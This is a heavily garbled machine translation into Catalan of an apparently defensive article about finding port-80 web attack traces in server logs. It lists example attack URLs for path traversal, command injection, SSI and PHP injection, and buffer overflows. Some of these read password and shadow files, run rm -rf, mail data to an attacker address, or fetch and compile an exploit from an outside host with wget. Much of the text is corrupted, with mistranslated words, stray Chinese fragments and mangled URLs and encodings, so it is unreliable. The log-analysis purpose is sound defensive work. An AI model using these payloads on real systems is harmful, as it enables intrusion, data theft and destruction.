I. Resum
II. Una descripció detallada de
III. Nous
IV. Anàlisi d'evitar la propagació
V. La transcodificació
VI. Conclusió
[Resum]
El web per defecte el port 80 del lloc per formar part dels seus problemes de seguretat en nombroses societats continuen els posin en llibertat, encara que algunes d'aquestes vulnerabilitats permeten a un atacant obtenir privilegis d'administrador del sistema per entrar en el lloc en si, el següent és el port Zenomorph 80 atacs en algunes de les empremtes investigació, i dir-li com trobar els problemes dels registres de registre.
[] Detall
Aquí, en part, a través d'un nombre de pantalla Liezi en els servidors web i aplicacions en el seu atac general, i les seves empremtes, que representen només el gran atac Liezi, no hi ha una llista de totes les formes d'atac, aquesta secció descripció detallada de la funció de cada atac, i la seva manera d'explotar aquestes vulnerabilitats als atacs.
(1) "." ".." I "..." petició
Les empremtes d'aquests atacs són molt comuns per a les aplicacions web i el lloc web, que utilitza per permetre que l'atacant o programa de cuc-virus per canviar la ruta del lloc web, per obtenir accés a recintes tancats. La majoria dels programes de CGI amb aquestes falles, ".." petició.
Exemple:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
Això demostra la sol.licitud atacant Liezi SDMO aquest arxiu, si l'atacant de la capacitat d'avanç de servidors web directori arrel, a continuació, obtenir més informació i per obtenir privilegis addicionals.
(2) "% 20" Sol licitud de
20% és el valor hexadecimal que els 16 espais, encara que això no significa que podeu utilitzar qualsevol cosa, però quan veu el registre, la trobarà, una sèrie d'aplicacions de servidor web que s'executen en aquest caràcter es pot aplicar de manera efectiva Per tant, vostè ha de revisar acuradament el registre. D'altra banda, la sol.licitud pot ajudar a vegades per realitzar alguns comandes.
Exemple:
http://host/cgi-bin/lame.cgi?page=ls% | 20-A
Aquesta mostra Liezi atacant executar una ordre de Unix, amb indicació del catàleg complet dels documents demanats, fent que l'atacant per accedir a arxius importants en el sistema, l'ajudarà a proporcionar més les condicions per a l'obtenció de privilegis.
(3) "% 00" Sol licitud de
00% va dir que el hexadecimal de 16 bytes buit, ell va ser capaç d'enganyar a l'aplicació web, i demanar diferents tipus d'arxius.
Exemples:
http://host/cgi-bin/lame.cgi?page=index.html
Això pot ser una sol licitud vàlida a la màquina, si un atacant conscient d'aquesta petició va tenir èxit, es buscarà seguir els procediments cgi.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
Potser el programa CGI no accepta aquesta petició, ja que és la sol.licitud per verificar el sufix de nom d'arxiu, com ara: tipus html.shtml o altre dels arxius. La major part del programa li dirà el tipus de fitxer demanada no és vàlida, aquesta vegada se li dirà al atacant demana l'arxiu ha de ser un personatge d'un sufix de tipus d'arxiu, de manera que un atacant pot obtenir la ruta de sistema, nom d'arxiu, donant per resultat seu sistema d'informació més sensible
00html% http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
L'atenció a aquesta sol • licitud, farà trampes programa cgi que aquest document és determinar els tipus de fitxer acceptables, algunes aplicacions de les inspeccions eficaces com a arxiu de sol licitud de estúpid, que normalment es fa servir mètodes de la atacant.
(4) "|" sol.licitud
Es tracta d'una barra vertical, en el sistema Unix, una comanda d'ajuda en l'execució d'ordres del sistema diverses al mateix temps.
Exemple:
# Access_log | grep-i gat ".."
(Aquesta comanda mostrarà el registre en el ".." sol.licitud, d'ús comú en els atacs i cucs trobats)
Sovint trobem que moltes aplicacions web utilitzen aquest personatge, això també dóna lloc a falses alarmes en els registres de IDS.
En l'examen acurat de la seva aplicació, de manera que l'avantatge de reduir les falses alarmes en els sistemes de detecció d'intrusions.
Algunes de Lieh-tzu:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls |
Aquesta comanda sol • licitud, els següents són alguns canvis en Liezi
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls%% 20-al | 20/etc
Aquesta sol.licitud està inclòs en un sistema Unix / directori etc de tots els arxius
% Http: / / host / cgi-bin / lame.cgi? Page = cat 20access_log% | grep 20-20% i "coix"
La comanda cat sol.licitud d'execució i l'aplicació de la comanda grep també, fes un cop d'ull als coixos "
(5) "," sol.licitud
En els sistemes Unix, aquest caràcter permet l'execució de diverses línies de comandes
Exemple:
Id #: uname-a
(Aplicació de la comanda id, seguit per l'aplicació de la comanda uname)
Alguns programes web amb aquest caràcter, pot resultar en el seu IDS registra un avís de la decisió, vostè ha de revisar acuradament el seu programa de web, de manera a reduir el risc de fracàs de les alertes de IDS.
(6) " " i " " Sol.licitud
En cas de veure els seus registres de registre dels dos personatges, una sèrie de raons, la primera és el caràcter que les dades afegits en el document
Exemple 1:
# Echo "la seva hax0red H0 H0" / etc / motd (sol.licitud motd informació escrita en aquest document)
Un atacant pot utilitzar fàcilment la sol.licitud, això a manipular la seva pàgina web. Tal com el famós RDS explotar l'atacant s'utilitza sovint per canviar la pàgina web.
Exemple 2:
Http: / / host / something.php = Hi 20mom%%% 20Im 20Bold!
Html et donaràs compte que el llenguatge dels signes aquí, ell també va passar " "," " personatges, aquests atacs no pot fer que l'atacant per entrar, es confon la gent pensa que això és una informació de llocs web legítims (que condueix a La gent visita aquest enllaç per visitar l'atacant per establir la direcció, aquesta sol.licitud pot ser codificat en 16 caràcters hexadecimals en la forma, de manera que els rastres de l'atac no és tan evident)
(7) "!" Sol.licitud
El llenguatge comú sobre aquest personatge sol.licitud SS (Server Side Include) em atac, si l'atacant és un atacant confondre l'usuari fa clic en el conjunt d'enllaç, i el mateix que l'anterior.
Exemple:
http://host1/something.php =
El Lieh-tzu és un atacant podria fer-ho en un arxiu en el lloc de host2 host1 apareix sobre (per descomptat, requereixen que els visitants a visitar a la configuració de l'atacant connexió. Aquesta petició pot ser convertida en 16 hexagonal codificació màscara, no es troben fàcilment)
Al mateix temps, aquest enfocament també pot executar l'autoritat de comandament lloc web
Exemple:
http://host/something.php =
El Lieh-tzu en l'aplicació d'un sistema remot "id" d'ordres, es mostrarà l'usuari del lloc web de id, en general el "ningú" o "www"
Aquesta forma permet també la inclou els arxius ocults.
Exemple:
http://host/something.php =
Els arxius ocults. Htpasswd no es mostrarà, Apache es neguen a establir les modalitats per. Ht el formulari de sol licitud, i el logotip de SSI passarà per alt aquestes restriccions, i conduir a problemes de seguretat
(8) "," Sol.licitud
Aquests atacs s'utilitzen per tractar de distància en el programa d'aplicació web PHP en el programa, pot permetre l'execució de comandaments, depenent de la configuració del servidor, i altres treballs d'alguns dels factors (php Biru estableix Anquanmoshi)
Exemple: = http://host/something.php passthru ("id ");?
En alguna aplicació php simple, pot ser el portal d'Internet sobre els drets d'usuari remot del sistema per executar la comanda local
(9) "` "sol.licitud
Aquest personatge utilitza més tard per executar comandaments en perl, els personatges de l'aplicació web no és d'ús freqüent, així que si vostè ho veu en el seu registre, ha de tenir molta cura
Exemple:
http://host/something.cgi = `id`
Escriviu un programa en perl cgi en qüestió donaria lloc a l'execució de la comanda id
[] Vegeu també
La següent secció es debatrà l'aplicació de més atacs podrien comanda, juntament amb els documents demanats, i si té un defecte d'execució remota de comandes, ha de ser com comprovar el descobriment. Aquesta part és només per donar-li una bona idea, i digui-li al seu sistema del que està succeint, els atacants intenten atacar els rastres del seu sistema, però no enumera tots els del atacant utilitzar les comandes i sol • licituds.
"/ Bin / ls"
Aquesta comanda demana la ruta completa de la web 应用 程序 Zaihen Duo tenen aquest defecte en la, si es registra en molts llocs en aquesta sol • licitud, la possibilitat és molt remota executar comandes Cunzai vulnerabilitat, però no necessàriament ser un Wentian També pot ser una falsa alarma. Una vegada més va recordar, aplicacions web escrites (cgi, asp, php, etc ...) és la base de la seguretat
Exemple:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls% | 20-A
http://host/cgi-bin/bad.cgi?doh=ls% al 20 -;
"Cmd.exe"
Aquesta és una finestra de la closca, si un atacant per accedir i executar aquest script en la configuració del servidor en les condicions permeses en la màquina Windows pot fer res, un munt de cucs és a través del port 80, la comunicació amb la màquina remota
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
"/ Bin / id"
Aquest és un arxiu de 2 hexagonal, els seus problemes i / bin / ls, com, si es registra en molts llocs aquesta sol.licitud, és possible que gran vulnerabilitat d'execució remota de comandes, però no necessàriament un problema També pot ser una falsa alarma.
Es mostrarà quina part pertany a cada usuari i grup
Exemple:
| Http: / / host / cgi-bin / bad.cgi? DOH =../../../../ bin / id
http://host/cgi-bin/bad.cgi?doh=id;
"/ Bin / rm"
Aquesta comanda pot esborrar arxius sense la deguda utilització és molt perillós
Exemples:
Http: / / host / cgi-bin / bad.cgi? DOH =../../../../ bin / rm% 20-rf 20% * |
Http: / / host / cgi-bin / bad.cgi? DOH = rm% 20% 20-rf *;
"Wget i tftp" comanda
Aquests comandaments són sovint l'atacant pot obtenir privilegis addicionals per a descarregar arxius, wget és una ordre d'UNIX baix, pot ser utilitzat per a descarregar portes del darrere, tftp està sota el comandament de Unix i NT, s'utilitza per descarregar l'arxiu. Alguns cucs es propaguen per IIS tftp per copiar el virus a altres hosts
Exemples:
20http% http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget: / / http:// host2/Phantasmp.c | acollida / cgi-bin / bad.cgi? DOH =% 20http wget: / / www.hwa-security.net/Phantasmp.c;
"Gat" comanda
Aquesta comanda s'utilitza per veure el contingut de l'arxiu, utilitza per a llegir la informació important, tal com fitxers de configuració, arxius de contrasenyes, arxius i documents de crèdit que es pugui imaginar
Exemples:% http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat 20/etc/motd | http://host/cgi-bin/ bad.cgi? DOH = cat% 20/etc/motd;
"Echo" comanda
Aquesta comanda s'utilitza per escriure dades a l'arxiu, com "index.html"
Exemples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo% 20 "# fc-kiwis% 20was 20here%"% 20 % | 200day.txt http://host/cgi-bin/bad.cgi?doh=echo% 20 "# fc-kiwis% 20was 20here%"% 20 200day.txt%;
Comando "ps"
Enumera els processos actualment en execució, informe al atacant que un host remot que executa el programari per tal de tenir una idea de les qüestions de seguretat, per obtenir permisos especials
Exemples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps% | 20-aux http://host/cgi-bin/bad. cgi? DOH =% 20-ps aux;
"Kill i killall" comanda
Sistemes Unix per matar a aquest procés, un atacant pot utilitzar aquesta comanda per aturar els serveis i processos del sistema també pot esborrar els rastres de l'atacant, alguna gesta es produeixen gran quantitat de processos fills
Exemples:% http://host/cgi-bin/bad.cgi?doh=../bin/kill 20-9% 200% | 20 http://host/cgi-bin/bad.cgi?doh=kill -9% 200;
"Uname" comanda
Aquesta comanda li diu a l'atacant el nom de la màquina remota, per algun temps, a través d'aquest lloc web es troba 知道 comandament que isp, potser aquest va ser l'agressor havia visitat. Uname-a per demanar en general, aquestes seran registrats en el fitxer de registre
Exemples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname% 20-un http://host/cgi-bin/bad |. cgi? DOH uname =% 20-a;
"CC, gcc, perl, python, etc ..." compilació i interpretació de l'ordre
L'atacant a través d'tftp descàrrega wget o explotar i utilitzar el compilador cc, gcc per compilar aquesta en un programa executable, i els privilegis d'accés més
Exemples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc% 20Phantasmp.c | http://host/cgi-bin/bad. cgi? DOH = gcc 20Phantasmp.c%;. / a.out% 20-p% 2031337;
Si consulta els registres trobats a "perl" python "Aquestes instruccions poden ser un atacant remot per a descarregar script en perl, python, i va tractar d'obtenir els privilegis dels locals
"Correu" d'ordres
Els atacants solen utilitzar aquest sistema de comandaments, alguns documents importants per l'atacant propi bústia de correu, el missatge també està disposada a dur a terme atemptats amb bomba es
Exemples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail 20attacker@fuckcnhonker.org% 20%
2.168.22.1;
"Chown, chmod, chgrp, chsh, etc ..." i altres comandes
Sistemes Unix per tal que puguin canviar l'arxiu de permisos
chown = permet establir que el propietari del fitxer chmod = permet establir permisos d'arxiu = chgrp permet al propietari canviar els permisos de grup en els arxius chsh = permès per canviar el shell de l'usuari
Exemples:% 20777% http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod 20index.html http://host/cgi-bin/ | bad.cgi? DOH =% 20777% chmod 20index.html;% http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown 20zeno% 20 / etc / master.passwd% http://host/cgi-bin/bad.cgi?doh=chsh | 20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../. . / .. / .. / bin / chgrp% 20nobody% 20/etc/shadow |
"/ Etc / passwd" arxiu
Aquest arxiu és el sistema de la contrasenya, generalment fora de l'ombra, i no els permet veure una clau de xifrat, però és l'atacant, que sabem que són un usuari vàlid, i la ruta del sistema absolut, nom del lloc, informació, etc, gràcies a en general per l'ombra d'apagada, de manera que l'atacant normalment veurà / etc / shadow
"/ Etc / master.passwd"
Aquest arxiu és l'arxiu de contrasenyes del sistema BSD, conté la contrasenya xifrada, l'arxiu en el compte root sols és de només lectura, i alguns atacant no qualificats s'obrirà dins d'ell tractant de llegir el contingut., Si el lloc web és privilegis de root, a continuació, l'atacant, podem llegir el contingut interior, molts problemes en l'administrador del sistema es vénen un darrere l'altre
"/ Etc / shadow"
Conté un sistema de contrasenya xifrada, llegir la mateixa en el compte de root, i / et / master.passwd gairebé
"/ Etc / motd"
Quan els usuaris inicien sessió en el sistema UNIX, la informació apareix en el "Missatge de la Jornada" L'arxiu, que proporciona informació important del sistema i administrador dels usuaris d'algun conjunt, els usuaris que volen veure els que no ho són, També conté la informació de versió del sistema, l'atacant solen veure aquest arxiu, per entendre el que el sistema s'executa en l'atacant, el següent pas és la recerca d'aquest tipus de sistemes, explotació, i un major accés al sistema de privilegis
"/ Etc / hosts"
El document proporciona l'adreça IP i xarxa d'informació, un atacant pot obtenir més informació sobre la configuració de xarxa del sistema
"/ Usr / local / apache / conf / httpd.conf"
Es tracta d'un servidor web Apache fitxer de configuració, un atacant pot entendre, com cgi, informació i altres ssi és accessible
"/ Etc / inetd.conf"
Aquest és el fitxer de configuració de serveis inetd un atacant pot obtenir l'equip remot, iniciï els serveis, ja sigui per utilitzar el contenidor per controlar l'accés, si el contenidor es va trobar en execució, un atacant el proper pas serà comprovar "/ etc / hosts.allow" i "/ etc /" hosts.deny, arxius, i que pot canviar alguns ajustaments, els privilegis d'accés
". Htpasswd. Htaccess i. Htgroup"
Aquests fitxers s'utilitzen típicament en l'autenticació d'usuari del lloc web, l'atacant no podria veure aquests arxius, i obtenir un nom d'usuari i contrasenya, l'arxiu de contrasenyes. Htpasswd està xifrat, trencar algun procés de desxifrat simple, permetre a un atacant accedir al lloc àrees protegides (en general l'usuari amb el mateix nom d'usuari i contrasenya, l'atacant pot fins i tot visitar altres comptes)
"Access_log i error_log"
Aquests són els fitxers de registre de servidor apache, els atacants solen veure aquests arxius, mira aquestes peticions es registren, aquestes i altres sol.licituds de diferents llocs
Normalment, l'atacant es modificarà aquests arxius de registre, com la seva pròpia informació de la direcció, l'atacant a través del port 80 a través del seu sistema i el seu sistema de còpia de seguretat tampoc funciona, no hi ha altre programa rècord registre de l'estat del sistema, el que detecció d'intrusos es torna molt difícil treballar
"[] Drive-carta: winntrepairsam._ o [lletra de la unitat-]: winntrepairsam"
Sistema de Windows NT arxiu de contrasenyes, si la comanda a distància no es pot implementar, els atacants solen demanar aquests documents, a continuació, "crac L0pht" del tipus d'eines per desxifrar contrasenyes crac, si l'atacant tracta d'atacar arxiu administrador contrasenya, si èxit, la màquina de control remot serà l'atacant pren el control
[Anàlisi de desbordament]
En aquest article no diré massa sobre el desbordament del tema, vaig a donar el que aquests fenòmens i els rastres de notable i de particular interès, un buffer és atacada amb freqüència per la conversió de codi maliciós i difícil de trobar altres formes d'aconseguir
Aquí és un simple Lie Zi
Exemple: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA
Aquesta Liezi mostra l'atacant en una aplicació per enviar un lot d'un personatge, per provar el programa un desbordament de memòria intermèdia, desbordament de memòria intermèdia pot aconseguir un control remot de comandes permisos d'acollida d'execució, si el propietari té el setuid i procediments per a l'arrel, a través del sobreeixidor, pot tenir accés a tot el sistema, sinó com el programa setuid, aleshores el desbordament és només mitjançant l'execució dels drets de l'usuari del lloc web
Aquí no es pot saber totes les circumstàncies, però vostè ha de comprovar periòdicament el seu arxiu de registre, si aquest dia de sobte vaig trobar un munt de peticions, però generalment no més de la sol.licitud, vol dir que són objecte d'atacs de desbordament, per descomptat, també pot ser Una nova xarxa atac del cuc
[Transcodificació]
Tots els atacs abans esmentats sol.licitud, l'atacant sap en general els sistemes IDS sol.licitud de verificació mecànica sovint, generalment l'atacant farà servir les dades d'eina de conversió per convertir el format de contingut demanat de 16 bandes, donant lloc a IDS ignorarà aquestes peticions, Estem familiaritzats amb la vulnerabilitat CGI eina d'anàlisi que és un bon bigoti Liezi. Si veieu el registre dels temps que es troben un gran nombre de 16 bandes i no alguns caràcters comuns, llavors l'atacant pot tractar d'usar algunes de les formes d'atacar el sistema
Una manera ràpida és el seu arxiu de registre de la sol licitud dels 16 hexagonal, amb còpia al seu navegador, el navegador es pot convertir en el dret de demanar, i es mostra el contingut de la sol.licitud, si no valor de prendre aquest risc, un simple home ASCII, li pot proporcionar el codi correcte.
[] Conclusió
Aquest article no pot cobrir tots els 80 ports Gong Ji, però per sobre de la molt popular entre la majoria de Lieju Letaibufen, i li dirà Com comprovar 文件 seu registre i com afegir Ru Yi Xie normes IDS, escrivint el seu objectiu és Web de l'administrador del sistema ha d'estar preocupat pel que una bona idea, al mateix temps, espero que aquest article ajudi a la web dels desenvolupadors de programes web per escriure millors programes
D'NOTA: Si vostè té qualsevol comentari i suggeriment, si us plau envieu un e-mail admin@cgisecurity.com.